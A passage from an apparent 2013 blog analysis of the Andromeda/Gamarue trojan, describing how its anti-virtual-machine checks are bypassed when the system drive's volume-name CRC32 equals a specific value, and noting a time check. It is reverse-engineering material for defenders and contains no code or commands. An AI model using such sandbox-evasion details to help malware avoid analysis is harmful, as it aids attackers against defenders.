Most of these checks can be bypassed if the CRC32 checksum of the system drive volume is <strong>0x20C7DD84</strong>. It seems that the bad guy was using a test environment and this was the way he was checking that the Trojan was running correctly. However, modifying the system drive volume name is not the only way to get Andromeda running <a href="http://joe4security.blogspot.ch/2013/08/anti-vm-gone-wrong.html">as Joe Security's guys were suggesting (&ldquo;<em>The real payload is <strong>only</strong> shown if the volumn name of the system drive equals a&nbsp;specific checksum</em>&rdquo;)</a>. If the environment can be able to bypass all the checks mentioned above, then the real payload will be executed as well. Sometimes the malware was not executing correctly in my virtual machine, as Joe Security's post says, but I think the cause is that probably it was overloaded and it was not bypassing the time check. </p>
http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis#commentsAnalysisAndromedaBanksBotnetsCitadelFraudMalwarePony LoaderReversingSun, 01 Sep 2013 17:56:09 +0000jesparza109 at http://eternal-todo.com